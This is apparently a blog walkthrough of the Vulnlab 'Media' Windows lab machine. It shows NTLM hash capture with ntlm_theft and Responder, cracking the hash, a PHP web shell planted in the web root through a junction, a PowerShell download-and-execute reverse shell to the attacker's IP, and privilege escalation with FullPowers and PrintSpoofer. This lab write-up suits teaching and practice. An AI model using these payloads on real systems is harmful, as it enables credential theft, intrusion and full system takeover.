Vulnab - Media

Vulnab – Media

In this walk through, we will be going through the Media room from Vulnlab. This room is rated as Medium on the platform and it consist of abusing of file upload functionality by creating documents to capture user NTLM hash, cracking it will give us initial access to the target. For Privilege Escalation, abuse of symlinks have to be done to upload a webshell on the target to get access as NT AUTHORITY/LOCAL SERVICE. At last, used FullPower exploit along with PrintSpoofer to get root on the target. So, let’s get started without any delay.

Media

Machine Info:

TitleMedia
IPaddress10.10.76.57
DifficultyMedium
OSWindows
DescriptionMedia is a Medium Windows machine that requires abusing of file upload functionality by creating documents to capture user NTLM hash, cracking it will give us initial access to the target. For Privilege Escalation, abuse of symlinks have to be done to upload a webshell on the target to get access as NT AUTHORITY/LOCAL SERVICE. At last, used FullPower exploit along with PrintSpoofer to get root on the target.

Enumeration:

  • I started off with a regular nmap scan along with all TCP port scan. Found 3 ports opened – 22 (SSH), 80 (HTTP) and 3389 (RDP).

$ sudo nmap -sV -sC 10.10.76.57

Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:18 IST

Nmap scan report for 10.10.76.57
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 0b:b3:c0:80:40:88:e1:ae:aa:3b:5f:f4:c2:23:c0:0d (RSA)
|   256 e0:80:3f:dd:b1:f8:fc:83:f5:de:d5:b3:2d:5a:4b:39 (ECDSA)
|_  256 b5:32:c0:72:18:10:0f:24:5d:f8:e1:ce:2a:73:5c:1f (ED25519)
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: ProMotion Studio
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MEDIA
|   NetBIOS_Domain_Name: MEDIA
|   NetBIOS_Computer_Name: MEDIA
|   DNS_Domain_Name: MEDIA
|   DNS_Computer_Name: MEDIA
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-22T11:49:20+00:00
| ssl-cert: Subject: commonName=MEDIA
| Not valid before: 2024-04-21T11:45:58
|_Not valid after:  2024-10-21T11:45:58
|_ssl-date: 2024-04-22T11:49:26+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.55 seconds

$ sudo nmap -p- -T5 10.10.76.57

Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 17:19 IST

Nmap scan report for 10.10.76.57
Host is up (0.20s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 292.96 seconds

PORT 80 (HTTP)

  • The web server running on port 80 consist of a static website of a Design studio.

Studio website page

  • The about section displays some potentials employee names.

Team

  • Found a file upload functionality. As per its description, it accepts video file for the HR. We can abuse it later to get a reverse shell on the target.

File upload functionality

  • Fired gobuster on the target to reveal some hidden directories, specially the one which we can use to trigger our file uploads but didn’t found any.

$ gobuster dir -u http://10.10.76.57/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.76.57/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
2024/04/22 17:35:26 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 332] [--> http://10.10.76.57/js/]
/css                  (Status: 301) [Size: 333] [--> http://10.10.76.57/css/]
/assets               (Status: 301) [Size: 336] [--> http://10.10.76.57/assets/]
/webalizer            (Status: 403) [Size: 420]                                 
/phpmyadmin           (Status: 403) [Size: 420]                                 
/examples             (Status: 503) [Size: 401]                                 
/licenses             (Status: 403) [Size: 420]                                 
/server-status        (Status: 403) [Size: 420]                                 
/con                  (Status: 403) [Size: 301]                                 
/con.asp              (Status: 403) [Size: 301]                                 
/con.aspx             (Status: 403) [Size: 301]                                 
/aux                  (Status: 403) [Size: 301]                                 
/aux.aspx             (Status: 403) [Size: 301]                                 
/aux.asp              (Status: 403) [Size: 301]                                 
                                                                                
===============================================================
2024/04/22 17:53:10 Finished
===============================================================

Exploitation:

  • As i know that the file upload functionality expects a media file. So, i create one with ntlm_ theft script. If all goes well and the user checks our media file, we will be able to capture their NetNTLMV2 hash with Responder.

python3 ntlm_theft.py -g wax -s 10.8.2.6 --filename media

creating files with ntlm_theft.py

  • Like i suspected, got the user “enox” hash and then cracked it using john.

sudo python3 Responder.py -I tun0

captured hash with Responder

enox::MEDIA:66ce4d0cf1dfba48:A699AB188E409F8B8728A5468931D5FE:01010000000000008061F754DE94DA01F6CEC41CB6ADCA4600000000020008004800500038004E0001001E00570049004E002D004A004400510043004E0046005A00570039003100320004003400570049004E002D004A004400510043004E0046005A0057003900310032002E004800500038004E002E004C004F00430041004C00030014004800500038004E002E004C004F00430041004C00050014004800500038004E002E004C004F00430041004C00070008008061F754DE94DA0106000400020000000800300030000000000000000000000000300000F60DD5F3E407850FA06D5F0AAD3B5CBB61CA844B9BB06C0F4949449785EEBED50A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0038002E0032002E0036000000000000000000

sudo john --wordlist=/usr/share/wordlists/rockyou.txt enox.hash

cracking the hash

  • Logged into the machine via SSH with enox creds and captured the local flag.

got initial access

Privilege Escalation:

  • Looked around the file system and found the source directory of the application. Peeking inside the index.php file reveals some really interesting information.

htdocs directory

<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

            // Update the todo.txt file
            $todoFile = $uploadDir . 'todo.txt';
            $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";

            // Append the new line to the file
            file_put_contents($todoFile, $todoContent, FILE_APPEND);
        } else {
            echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
        }
    }
    ?>

  • We now know that the Uploads from the application is stored in “C:/Windows/Tasks/Uploads/” directory and the folder name is calculated using the MD5 hash of firstname, lastname and email in the upload form.

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

  • I created a shell.php file with the following web shell contents.

<?php
echo system($_GET['c']);
?>

  • As we already know, how the upload folder is being created. So, we now can predict our uploads folder beforehand. I quickly calculated a MD5 hash of firstnamelastnameemail.

echo -n "[email protected]" | md5sum

50246ad7e7c5f6c75808fe08f5dfcb6e 

creating md5 hash of target email

  • So, we can use symlinks or junction to abuse this. For this, we will first create the directory we have predicted, then will delete it and create a symlink of it to the root of the application folder that is C:\xampp\htdocs. Post that, we will able to upload and include our webshell to the root directory and thus can get command execution.

# Creating and removing our predicted directory

mkdir 50246ad7e7c5f6c75808fe08f5dfcb6e

rmdir 50246ad7e7c5f6c75808fe08f5dfcb6e

# Creating symlink

mklink /J C:\Windows\Tasks\Uploads\50246ad7e7c5f6c75808fe08f5dfcb6e C:\xampp\htdocs\

creating symlinks

  • Uploading the shell.php webshell with our specified values for first name, lastname and email.

uploading shell.php

shell uploaded

  • Got our webshell working as user local service. Let’s upgrade it to a full blown reverse shell with powercat.

got access as nt authority\local service

Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.8.2.6:8000/powercat.ps1');powercat -c 10.8.2.6 -p 445 -e cmd

got access as nt authority\local service

  • Now that we have access to the target as a local service. We can use FullPowers exploit in order to enable all the privileges on the target.

Exploithttps://github.com/itm4n/FullPowers.git

Exploithttps://github.com/itm4n/PrintSpoofer/releases

Firing FullPowers.exe

Enabled the privileges

  • We can now abuse the enabled SEImpersonate privilege using PrintSpoofer exploit to get shell as NT AUTHORITY/ SYSTEM.

PrintSpoofer.exe -i c cmd

got root

Also Read: Vulnlab – Feedback

Conclusion:

Conclusion

So that was “Media” for you. We started off with a regular nmap scan and found 3 ports opened – 22 (SSH), 80 (HTTP) and 3389 (RDP). Enumerated the webserver on port 80 and found a file upload functionality. Abused it by creating documents using ntlm_theft script to capture user NTLM hash, cracking it gave us initial access to the target. For Privilege Escalation, we abused symlinks to upload a webshell on the target which gave us access as NT AUTHORITY/LOCAL SERVICE. At last, used FullPower exploit along with PrintSpoofer to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top